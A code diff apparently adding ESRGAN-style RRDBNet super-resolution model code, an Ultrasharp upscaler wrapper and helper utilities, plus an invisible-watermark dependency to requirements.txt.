 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # this file is adapted from https://github.com/victorca25/iNNfer
2
+
3
+ import math
4
+ from collections import OrderedDict
5
+
6
+ import torch
7
+ import torch.nn as nn
8
+ import torch.nn.functional as F
9
+
10
+ ####################
11
+ # RRDBNet Generator
12
+ ####################
13
+
14
+
15
+ class RRDBNet(nn.Module):
16
+ def __init__(
17
+ self,
18
+ in_nc,
19
+ out_nc,
20
+ nf,
21
+ nb,
22
+ nr=3,
23
+ gc=32,
24
+ upscale=4,
25
+ norm_type=None,
26
+ act_type="leakyrelu",
27
+ mode="CNA",
28
+ upsample_mode="upconv",
29
+ convtype="Conv2D",
30
+ finalact=None,
31
+ gaussian_noise=False,
32
+ plus=False,
33
+ ):
34
+ super(RRDBNet, self).__init__()
35
+ n_upscale = int(math.log(upscale, 2))
36
+ if upscale == 3:
37
+ n_upscale = 1
38
+
39
+ self.resrgan_scale = 0
40
+ if in_nc % 16 == 0:
41
+ self.resrgan_scale = 1
42
+ elif in_nc != 4 and in_nc % 4 == 0:
43
+ self.resrgan_scale = 2
44
+
45
+ fea_conv = conv_block(
46
+ in_nc, nf, kernel_size=3, norm_type=None, act_type=None, convtype=convtype
47
+ )
48
+ rb_blocks = [
49
+ RRDB(
50
+ nf,
51
+ nr,
52
+ kernel_size=3,
53
+ gc=32,
54
+ stride=1,
55
+ bias=1,
56
+ pad_type="zero",
57
+ norm_type=norm_type,
58
+ act_type=act_type,
59
+ mode="CNA",
60
+ convtype=convtype,
61
+ gaussian_noise=gaussian_noise,
62
+ plus=plus,
63
+ )
64
+ for _ in range(nb)
65
+ ]
66
+ LR_conv = conv_block(
67
+ nf,
68
+ nf,
69
+ kernel_size=3,
70
+ norm_type=norm_type,
71
+ act_type=None,
72
+ mode=mode,
73
+ convtype=convtype,
74
+ )
75
+
76
+ if upsample_mode == "upconv":
77
+ upsample_block = upconv_block
78
+ elif upsample_mode == "pixelshuffle":
79
+ upsample_block = pixelshuffle_block
80
+ else:
81
+ raise NotImplementedError(f"upsample mode [{upsample_mode}] is not found")
82
+ if upscale == 3:
83
+ upsampler = upsample_block(nf, nf, 3, act_type=act_type, convtype=convtype)
84
+ else:
85
+ upsampler = [
86
+ upsample_block(nf, nf, act_type=act_type, convtype=convtype)
87
+ for _ in range(n_upscale)
88
+ ]
89
+ HR_conv0 = conv_block(
90
+ nf, nf, kernel_size=3, norm_type=None, act_type=act_type, convtype=convtype
91
+ )
92
+ HR_conv1 = conv_block(
93
+ nf, out_nc, kernel_size=3, norm_type=None, act_type=None, convtype=convtype
94
+ )
95
+
96
+ outact = act(finalact) if finalact else None
97
+
98
+ self.model = sequential(
99
+ fea_conv,
100
+ ShortcutBlock(sequential(*rb_blocks, LR_conv)),
101
+ *upsampler,
102
+ HR_conv0,
103
+ HR_conv1,
104
+ outact,
105
+ )
106
+
107
+ def forward(self, x, outm=None):
108
+ if self.resrgan_scale == 1:
109
+ feat = pixel_unshuffle(x, scale=4)
110
+ elif self.resrgan_scale == 2:
111
+ feat = pixel_unshuffle(x, scale=2)
112
+ else:
113
+ feat = x
114
+
115
+ return self.model(feat)
116
+
117
+
118
+ class RRDB(nn.Module):
119
+ """
120
+ Residual in Residual Dense Block
121
+ (ESRGAN: Enhanced Super-Resolution Generative Adversarial Networks)
122
+ """
123
+
124
+ def __init__(
125
+ self,
126
+ nf,
127
+ nr=3,
128
+ kernel_size=3,
129
+ gc=32,
130
+ stride=1,
131
+ bias=1,
132
+ pad_type="zero",
133
+ norm_type=None,
134
+ act_type="leakyrelu",
135
+ mode="CNA",
136
+ convtype="Conv2D",
137
+ spectral_norm=False,
138
+ gaussian_noise=False,
139
+ plus=False,
140
+ ):
141
+ super(RRDB, self).__init__()
142
+ # This is for backwards compatibility with existing models
143
+ if nr == 3:
144
+ self.RDB1 = ResidualDenseBlock_5C(
145
+ nf,
146
+ kernel_size,
147
+ gc,
148
+ stride,
149
+ bias,
150
+ pad_type,
151
+ norm_type,
152
+ act_type,
153
+ mode,
154
+ convtype,
155
+ spectral_norm=spectral_norm,
156
+ gaussian_noise=gaussian_noise,
157
+ plus=plus,
158
+ )
159
+ self.RDB2 = ResidualDenseBlock_5C(
160
+ nf,
161
+ kernel_size,
162
+ gc,
163
+ stride,
164
+ bias,
165
+ pad_type,
166
+ norm_type,
167
+ act_type,
168
+ mode,
169
+ convtype,
170
+ spectral_norm=spectral_norm,
171
+ gaussian_noise=gaussian_noise,
172
+ plus=plus,
173
+ )
174
+ self.RDB3 = ResidualDenseBlock_5C(
175
+ nf,
176
+ kernel_size,
177
+ gc,
178
+ stride,
179
+ bias,
180
+ pad_type,
181
+ norm_type,
182
+ act_type,
183
+ mode,
184
+ convtype,
185
+ spectral_norm=spectral_norm,
186
+ gaussian_noise=gaussian_noise,
187
+ plus=plus,
188
+ )
189
+ else:
190
+ RDB_list = [
191
+ ResidualDenseBlock_5C(
192
+ nf,
193
+ kernel_size,
194
+ gc,
195
+ stride,
196
+ bias,
197
+ pad_type,
198
+ norm_type,
199
+ act_type,
200
+ mode,
201
+ convtype,
202
+ spectral_norm=spectral_norm,
203
+ gaussian_noise=gaussian_noise,
204
+ plus=plus,
205
+ )
206
+ for _ in range(nr)
207
+ ]
208
+ self.RDBs = nn.Sequential(*RDB_list)
209
+
210
+ def forward(self, x):
211
+ if hasattr(self, "RDB1"):
212
+ out = self.RDB1(x)
213
+ out = self.RDB2(out)
214
+ out = self.RDB3(out)
215
+ else:
216
+ out = self.RDBs(x)
217
+ return out * 0.2 + x
218
+
219
+
220
+ class ResidualDenseBlock_5C(nn.Module):
221
+ """
222
+ Residual Dense Block
223
+ The core module of paper: (Residual Dense Network for Image Super-Resolution, CVPR 18)
224
+ Modified options that can be used:
225
+ - "Partial Convolution based Padding" arXiv:1811.11718
226
+ - "Spectral normalization" arXiv:1802.05957
227
+ - "ICASSP 2020 - ESRGAN+ : Further Improving ESRGAN" N. C.
228
+ {Rakotonirina} and A. {Rasoanaivo}
229
+ """
230
+
231
+ def __init__(
232
+ self,
233
+ nf=64,
234
+ kernel_size=3,
235
+ gc=32,
236
+ stride=1,
237
+ bias=1,
238
+ pad_type="zero",
239
+ norm_type=None,
240
+ act_type="leakyrelu",
241
+ mode="CNA",
242
+ convtype="Conv2D",
243
+ spectral_norm=False,
244
+ gaussian_noise=False,
245
+ plus=False,
246
+ ):
247
+ super(ResidualDenseBlock_5C, self).__init__()
248
+
249
+ self.noise = GaussianNoise() if gaussian_noise else None
250
+ self.conv1x1 = conv1x1(nf, gc) if plus else None
251
+
252
+ self.conv1 = conv_block(
253
+ nf,
254
+ gc,
255
+ kernel_size,
256
+ stride,
257
+ bias=bias,
258
+ pad_type=pad_type,
259
+ norm_type=norm_type,
260
+ act_type=act_type,
261
+ mode=mode,
262
+ convtype=convtype,
263
+ spectral_norm=spectral_norm,
264
+ )
265
+ self.conv2 = conv_block(
266
+ nf + gc,
267
+ gc,
268
+ kernel_size,
269
+ stride,
270
+ bias=bias,
271
+ pad_type=pad_type,
272
+ norm_type=norm_type,
273
+ act_type=act_type,
274
+ mode=mode,
275
+ convtype=convtype,
276
+ spectral_norm=spectral_norm,
277
+ )
278
+ self.conv3 = conv_block(
279
+ nf + 2 * gc,
280
+ gc,
281
+ kernel_size,
282
+ stride,
283
+ bias=bias,
284
+ pad_type=pad_type,
285
+ norm_type=norm_type,
286
+ act_type=act_type,
287
+ mode=mode,
288
+ convtype=convtype,
289
+ spectral_norm=spectral_norm,
290
+ )
291
+ self.conv4 = conv_block(
292
+ nf + 3 * gc,
293
+ gc,
294
+ kernel_size,
295
+ stride,
296
+ bias=bias,
297
+ pad_type=pad_type,
298
+ norm_type=norm_type,
299
+ act_type=act_type,
300
+ mode=mode,
301
+ convtype=convtype,
302
+ spectral_norm=spectral_norm,
303
+ )
304
+ if mode == "CNA":
305
+ last_act = None
306
+ else:
307
+ last_act = act_type
308
+ self.conv5 = conv_block(
309
+ nf + 4 * gc,
310
+ nf,
311
+ 3,
312
+ stride,
313
+ bias=bias,
314
+ pad_type=pad_type,
315
+ norm_type=norm_type,
316
+ act_type=last_act,
317
+ mode=mode,
318
+ convtype=convtype,
319
+ spectral_norm=spectral_norm,
320
+ )
321
+
322
+ def forward(self, x):
323
+ x1 = self.conv1(x)
324
+ x2 = self.conv2(torch.cat((x, x1), 1))
325
+ if self.conv1x1:
326
+ x2 = x2 + self.conv1x1(x)
327
+ x3 = self.conv3(torch.cat((x, x1, x2), 1))
328
+ x4 = self.conv4(torch.cat((x, x1, x2, x3), 1))
329
+ if self.conv1x1:
330
+ x4 = x4 + x2
331
+ x5 = self.conv5(torch.cat((x, x1, x2, x3, x4), 1))
332
+ if self.noise:
333
+ return self.noise(x5.mul(0.2) + x)
334
+ else:
335
+ return x5 * 0.2 + x
336
+
337
+
338
+ ####################
339
+ # ESRGANplus
340
+ ####################
341
+
342
+
343
+ class GaussianNoise(nn.Module):
344
+ def __init__(self, sigma=0.1, is_relative_detach=False):
345
+ super().__init__()
346
+ self.sigma = sigma
347
+ self.is_relative_detach = is_relative_detach
348
+ self.noise = torch.tensor(0, dtype=torch.float)
349
+
350
+ def forward(self, x):
351
+ if self.training and self.sigma != 0:
352
+ self.noise = self.noise.to(x.device)
353
+ scale = (
354
+ self.sigma * x.detach() if self.is_relative_detach else self.sigma * x
355
+ )
356
+ sampled_noise = self.noise.repeat(*x.size()).normal_() * scale
357
+ x = x + sampled_noise
358
+ return x
359
+
360
+
361
+ def conv1x1(in_planes, out_planes, stride=1):
362
+ return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
363
+
364
+
365
+ ####################
366
+ # SRVGGNetCompact
367
+ ####################
368
+
369
+
370
+ class SRVGGNetCompact(nn.Module):
371
+ """A compact VGG-style network structure for super-resolution.
372
+ This class is copied from https://github.com/xinntao/Real-ESRGAN
373
+ """
374
+
375
+ def __init__(
376
+ self,
377
+ num_in_ch=3,
378
+ num_out_ch=3,
379
+ num_feat=64,
380
+ num_conv=16,
381
+ upscale=4,
382
+ act_type="prelu",
383
+ ):
384
+ super(SRVGGNetCompact, self).__init__()
385
+ self.num_in_ch = num_in_ch
386
+ self.num_out_ch = num_out_ch
387
+ self.num_feat = num_feat
388
+ self.num_conv = num_conv
389
+ self.upscale = upscale
390
+ self.act_type = act_type
391
+
392
+ self.body = nn.ModuleList()
393
+ # the first conv
394
+ self.body.append(nn.Conv2d(num_in_ch, num_feat, 3, 1, 1))
395
+ # the first activation
396
+ if act_type == "relu":
397
+ activation = nn.ReLU(inplace=True)
398
+ elif act_type == "prelu":
399
+ activation = nn.PReLU(num_parameters=num_feat)
400
+ elif act_type == "leakyrelu":
401
+ activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
402
+ self.body.append(activation)
403
+
404
+ # the body structure
405
+ for _ in range(num_conv):
406
+ self.body.append(nn.Conv2d(num_feat, num_feat, 3, 1, 1))
407
+ # activation
408
+ if act_type == "relu":
409
+ activation = nn.ReLU(inplace=True)
410
+ elif act_type == "prelu":
411
+ activation = nn.PReLU(num_parameters=num_feat)
412
+ elif act_type == "leakyrelu":
413
+ activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
414
+ self.body.append(activation)
415
+
416
+ # the last conv
417
+ self.body.append(nn.Conv2d(num_feat, num_out_ch * upscale * upscale, 3, 1, 1))
418
+ # upsample
419
+ self.upsampler = nn.PixelShuffle(upscale)
420
+
421
+ def forward(self, x):
422
+ out = x
423
+ for i in range(0, len(self.body)):
424
+ out = self.body[i](out)
425
+
426
+ out = self.upsampler(out)
427
+ # add the nearest upsampled image, so that the network learns the residual
428
+ base = F.interpolate(x, scale_factor=self.upscale, mode="nearest")
429
+ out += base
430
+ return out
431
+
432
+
433
+ ####################
434
+ # Upsampler
435
+ ####################
436
+
437
+
438
+ class Upsample(nn.Module):
439
+ r"""Upsamples a given multi-channel 1D (temporal), 2D (spatial) or 3D (volumetric) data.
440
+ The input data is assumed to be of the form
441
+ `minibatch x channels x [optional depth] x [optional height] x width`.
442
+ """
443
+
444
+ def __init__(
445
+ self, size=None, scale_factor=None, mode="nearest", align_corners=None
446
+ ):
447
+ super(Upsample, self).__init__()
448
+ if isinstance(scale_factor, tuple):
449
+ self.scale_factor = tuple(float(factor) for factor in scale_factor)
450
+ else:
451
+ self.scale_factor = float(scale_factor) if scale_factor else None
452
+ self.mode = mode
453
+ self.size = size
454
+ self.align_corners = align_corners
455
+
456
+ def forward(self, x):
457
+ return nn.functional.interpolate(
458
+ x,
459
+ size=self.size,
460
+ scale_factor=self.scale_factor,
461
+ mode=self.mode,
462
+ align_corners=self.align_corners,
463
+ )
464
+
465
+ def extra_repr(self):
466
+ if self.scale_factor is not None:
467
+ info = f"scale_factor={self.scale_factor}"
468
+ else:
469
+ info = f"size={self.size}"
470
+ info += f", mode={self.mode}"
471
+ return info
472
+
473
+
474
+ def pixel_unshuffle(x, scale):
475
+ """Pixel unshuffle.
476
+ Args:
477
+ x (Tensor): Input feature with shape (b, c, hh, hw).
478
+ scale (int): Downsample ratio.
479
+ Returns:
480
+ Tensor: the pixel unshuffled feature.
481
+ """
482
+ b, c, hh, hw = x.size()
483
+ out_channel = c * (scale**2)
484
+ assert hh % scale == 0 and hw % scale == 0
485
+ h = hh // scale
486
+ w = hw // scale
487
+ x_view = x.view(b, c, h, scale, w, scale)
488
+ return x_view.permute(0, 1, 3, 5, 2, 4).reshape(b, out_channel, h, w)
489
+
490
+
491
+ def pixelshuffle_block(
492
+ in_nc,
493
+ out_nc,
494
+ upscale_factor=2,
495
+ kernel_size=3,
496
+ stride=1,
497
+ bias=True,
498
+ pad_type="zero",
499
+ norm_type=None,
500
+ act_type="relu",
501
+ convtype="Conv2D",
502
+ ):
503
+ """
504
+ Pixel shuffle layer
505
+ (Real-Time Single Image and Video Super-Resolution Using an Efficient Sub-Pixel Convolutional
506
+ Neural Network, CVPR17)
507
+ """
508
+ conv = conv_block(
509
+ in_nc,
510
+ out_nc * (upscale_factor**2),
511
+ kernel_size,
512
+ stride,
513
+ bias=bias,
514
+ pad_type=pad_type,
515
+ norm_type=None,
516
+ act_type=None,
517
+ convtype=convtype,
518
+ )
519
+ pixel_shuffle = nn.PixelShuffle(upscale_factor)
520
+
521
+ n = norm(norm_type, out_nc) if norm_type else None
522
+ a = act(act_type) if act_type else None
523
+ return sequential(conv, pixel_shuffle, n, a)
524
+
525
+
526
+ def upconv_block(
527
+ in_nc,
528
+ out_nc,
529
+ upscale_factor=2,
530
+ kernel_size=3,
531
+ stride=1,
532
+ bias=True,
533
+ pad_type="zero",
534
+ norm_type=None,
535
+ act_type="relu",
536
+ mode="nearest",
537
+ convtype="Conv2D",
538
+ ):
539
+ """Upconv layer"""
540
+ upscale_factor = (
541
+ (1, upscale_factor, upscale_factor) if convtype == "Conv3D" else upscale_factor
542
+ )
543
+ upsample = Upsample(scale_factor=upscale_factor, mode=mode)
544
+ conv = conv_block(
545
+ in_nc,
546
+ out_nc,
547
+ kernel_size,
548
+ stride,
549
+ bias=bias,
550
+ pad_type=pad_type,
551
+ norm_type=norm_type,
552
+ act_type=act_type,
553
+ convtype=convtype,
554
+ )
555
+ return sequential(upsample, conv)
556
+
557
+
558
+ ####################
559
+ # Basic blocks
560
+ ####################
561
+
562
+
563
+ def make_layer(basic_block, num_basic_block, **kwarg):
564
+ """Make layers by stacking the same blocks.
565
+ Args:
566
+ basic_block (nn.module): nn.module class for basic block. (block)
567
+ num_basic_block (int): number of blocks. (n_layers)
568
+ Returns:
569
+ nn.Sequential: Stacked blocks in nn.Sequential.
570
+ """
571
+ layers = []
572
+ for _ in range(num_basic_block):
573
+ layers.append(basic_block(**kwarg))
574
+ return nn.Sequential(*layers)
575
+
576
+
577
+ def act(act_type, inplace=True, neg_slope=0.2, n_prelu=1, beta=1.0):
578
+ """activation helper"""
579
+ act_type = act_type.lower()
580
+ if act_type == "relu":
581
+ layer = nn.ReLU(inplace)
582
+ elif act_type in ("leakyrelu", "lrelu"):
583
+ layer = nn.LeakyReLU(neg_slope, inplace)
584
+ elif act_type == "prelu":
585
+ layer = nn.PReLU(num_parameters=n_prelu, init=neg_slope)
586
+ elif act_type == "tanh": # [-1, 1] range output
587
+ layer = nn.Tanh()
588
+ elif act_type == "sigmoid": # [0, 1] range output
589
+ layer = nn.Sigmoid()
590
+ else:
591
+ raise NotImplementedError(f"activation layer [{act_type}] is not found")
592
+ return layer
593
+
594
+
595
+ class Identity(nn.Module):
596
+ def __init__(self, *kwargs):
597
+ super(Identity, self).__init__()
598
+
599
+ def forward(self, x, *kwargs):
600
+ return x
601
+
602
+
603
+ def norm(norm_type, nc):
604
+ """Return a normalization layer"""
605
+ norm_type = norm_type.lower()
606
+ if norm_type == "batch":
607
+ layer = nn.BatchNorm2d(nc, affine=True)
608
+ elif norm_type == "instance":
609
+ layer = nn.InstanceNorm2d(nc, affine=False)
610
+ elif norm_type == "none":
611
+
612
+ def norm_layer(x):
613
+ return Identity()
614
+
615
+ else:
616
+ raise NotImplementedError(f"normalization layer [{norm_type}] is not found")
617
+ return layer
618
+
619
+
620
+ def pad(pad_type, padding):
621
+ """padding layer helper"""
622
+ pad_type = pad_type.lower()
623
+ if padding == 0:
624
+ return None
625
+ if pad_type == "reflect":
626
+ layer = nn.ReflectionPad2d(padding)
627
+ elif pad_type == "replicate":
628
+ layer = nn.ReplicationPad2d(padding)
629
+ elif pad_type == "zero":
630
+ layer = nn.ZeroPad2d(padding)
631
+ else:
632
+ raise NotImplementedError(f"padding layer [{pad_type}] is not implemented")
633
+ return layer
634
+
635
+
636
+ def get_valid_padding(kernel_size, dilation):
637
+ kernel_size = kernel_size + (kernel_size - 1) * (dilation - 1)
638
+ padding = (kernel_size - 1) // 2
639
+ return padding
640
+
641
+
642
+ class ShortcutBlock(nn.Module):
643
+ """Elementwise sum the output of a submodule to its input"""
644
+
645
+ def __init__(self, submodule):
646
+ super(ShortcutBlock, self).__init__()
647
+ self.sub = submodule
648
+
649
+ def forward(self, x):
650
+ output = x + self.sub(x)
651
+ return output
652
+
653
+ def __repr__(self):
654
+ return "Identity + \n|" + self.sub.__repr__().replace("\n", "\n|")
655
+
656
+
657
+ def sequential(*args):
658
+ """Flatten Sequential. It unwraps nn.Sequential."""
659
+ if len(args) == 1:
660
+ if isinstance(args[0], OrderedDict):
661
+ raise NotImplementedError("sequential does not support OrderedDict input.")
662
+ return args[0] # No sequential is needed.
663
+ modules = []
664
+ for module in args:
665
+ if isinstance(module, nn.Sequential):
666
+ for submodule in module.children():
667
+ modules.append(submodule)
668
+ elif isinstance(module, nn.Module):
669
+ modules.append(module)
670
+ return nn.Sequential(*modules)
671
+
672
+
673
+ def conv_block(
674
+ in_nc,
675
+ out_nc,
676
+ kernel_size,
677
+ stride=1,
678
+ dilation=1,
679
+ groups=1,
680
+ bias=True,
681
+ pad_type="zero",
682
+ norm_type=None,
683
+ act_type="relu",
684
+ mode="CNA",
685
+ convtype="Conv2D",
686
+ spectral_norm=False,
687
+ ):
688
+ """Conv layer with padding, normalization, activation"""
689
+ assert mode in ["CNA", "NAC", "CNAC"], f"Wrong conv mode [{mode}]"
690
+ padding = get_valid_padding(kernel_size, dilation)
691
+ p = pad(pad_type, padding) if pad_type and pad_type != "zero" else None
692
+ padding = padding if pad_type == "zero" else 0
693
+
694
+ if convtype == "PartialConv2D":
695
+ from torchvision.ops import (
696
+ PartialConv2d,
697
+ ) # this is definitely not going to work, but PartialConv2d doesn't work anyway and this shuts up static analyzer
698
+
699
+ c = PartialConv2d(
700
+ in_nc,
701
+ out_nc,
702
+ kernel_size=kernel_size,
703
+ stride=stride,
704
+ padding=padding,
705
+ dilation=dilation,
706
+ bias=bias,
707
+ groups=groups,
708
+ )
709
+ elif convtype == "DeformConv2D":
710
+ from torchvision.ops import DeformConv2d # not tested
711
+
712
+ c = DeformConv2d(
713
+ in_nc,
714
+ out_nc,
715
+ kernel_size=kernel_size,
716
+ stride=stride,
717
+ padding=padding,
718
+ dilation=dilation,
719
+ bias=bias,
720
+ groups=groups,
721
+ )
722
+ elif convtype == "Conv3D":
723
+ c = nn.Conv3d(
724
+ in_nc,
725
+ out_nc,
726
+ kernel_size=kernel_size,
727
+ stride=stride,
728
+ padding=padding,
729
+ dilation=dilation,
730
+ bias=bias,
731
+ groups=groups,
732
+ )
733
+ else:
734
+ c = nn.Conv2d(
735
+ in_nc,
736
+ out_nc,
737
+ kernel_size=kernel_size,
738
+ stride=stride,
739
+ padding=padding,
740
+ dilation=dilation,
741
+ bias=bias,
742
+ groups=groups,
743
+ )
744
+
745
+ if spectral_norm:
746
+ c = nn.utils.spectral_norm(c)
747
+
748
+ a = act(act_type) if act_type else None
749
+ if "CNA" in mode:
750
+ n = norm(norm_type, out_nc) if norm_type else None
751
+ return sequential(p, c, n, a)
752
+ elif mode == "NAC":
753
+ if norm_type is None and act_type is not None:
754
+ a = act(act_type, inplace=False)
755
+ n = norm(norm_type, in_nc) if norm_type else None
756
+ return sequential(n, a, p, c)
models/ultrasharp/model.py ADDED
@@ -0,0 +1,27 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ from typing import List
2
+
3
+ import torch
4
+
5
+ import models.ultrasharp.arch as arch
6
+ from models.ultrasharp.util import infer_params, upscale_without_tiling
7
+
8
+
9
+ class Ultrasharp:
10
+ def __init__(self, filename):
11
+ self.filename = filename
12
+
13
+ def enhance(self, img, outscale=4):
14
+ state_dict = torch.load(self.filename, map_location="cpu")
15
+
16
+ in_nc, out_nc, nf, nb, plus, mscale = infer_params(state_dict)
17
+
18
+ model = arch.RRDBNet(
19
+ in_nc=in_nc, out_nc=out_nc, nf=nf, nb=nb, upscale=mscale, plus=plus
20
+ )
21
+ model.load_state_dict(state_dict)
22
+ model.eval()
23
+
24
+ model.to("cuda")
25
+
26
+ img = upscale_without_tiling(model, img)
27
+ return img, None
models/ultrasharp/util.py ADDED
@@ -0,0 +1,47 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import numpy as np
2
+ import torch
3
+
4
+
5
+ def infer_params(state_dict):
6
+ # this code is copied from https://github.com/victorca25/iNNfer
7
+ scale2x = 0
8
+ scalemin = 6
9
+ n_uplayer = 0
10
+ plus = False
11
+
12
+ for block in list(state_dict):
13
+ parts = block.split(".")
14
+ n_parts = len(parts)
15
+ if n_parts == 5 and parts[2] == "sub":
16
+ nb = int(parts[3])
17
+ elif n_parts == 3:
18
+ part_num = int(parts[1])
19
+ if part_num > scalemin and parts[0] == "model" and parts[2] == "weight":
20
+ scale2x += 1
21
+ if part_num > n_uplayer:
22
+ n_uplayer = part_num
23
+ out_nc = state_dict[block].shape[0]
24
+ if not plus and "conv1x1" in block:
25
+ plus = True
26
+
27
+ nf = state_dict["model.0.weight"].shape[0]
28
+ in_nc = state_dict["model.0.weight"].shape[1]
29
+ out_nc = out_nc
30
+ scale = 2**scale2x
31
+
32
+ return in_nc, out_nc, nf, nb, plus, scale
33
+
34
+
35
+ def upscale_without_tiling(model, img):
36
+ img = np.array(img)
37
+ img = img[:, :, ::-1]
38
+ img = np.ascontiguousarray(np.transpose(img, (2, 0, 1))) / 255
39
+ img = torch.from_numpy(img).float()
40
+ img = img.unsqueeze(0).to("cuda")
41
+ with torch.no_grad():
42
+ output = model(img)
43
+ output = output.squeeze().float().cpu().clamp_(0, 1).numpy()
44
+ output = 255.0 * np.moveaxis(output, 0, 2)
45
+ output = output.astype(np.uint8)
46
+ output = output[:, :, ::-1]
47
+ return output
requirements.txt CHANGED
@@ -35,6 +35,7 @@ webdataset==0.2.48
35
  https://comic-assets.s3.ap-south-1.amazonaws.com/packages/mmcv_full-1.7.0-cp39-cp39-linux_x86_64.whl
36
  python-dateutil==2.8.2
37
  PyYAML
 
38
  torchvision==0.15.2
39
  imgaug==0.4.0
40
  tqdm==4.64.1
 
35
  https://comic-assets.s3.ap-south-1.amazonaws.com/packages/mmcv_full-1.7.0-cp39-cp39-linux_x86_64.whl
36
  python-dateutil==2.8.2
37
  PyYAML
38
+ invisible-watermark
39
  torchvision==0.15.2
40
  imgaug==0.4.0
41
  tqdm==4.64.1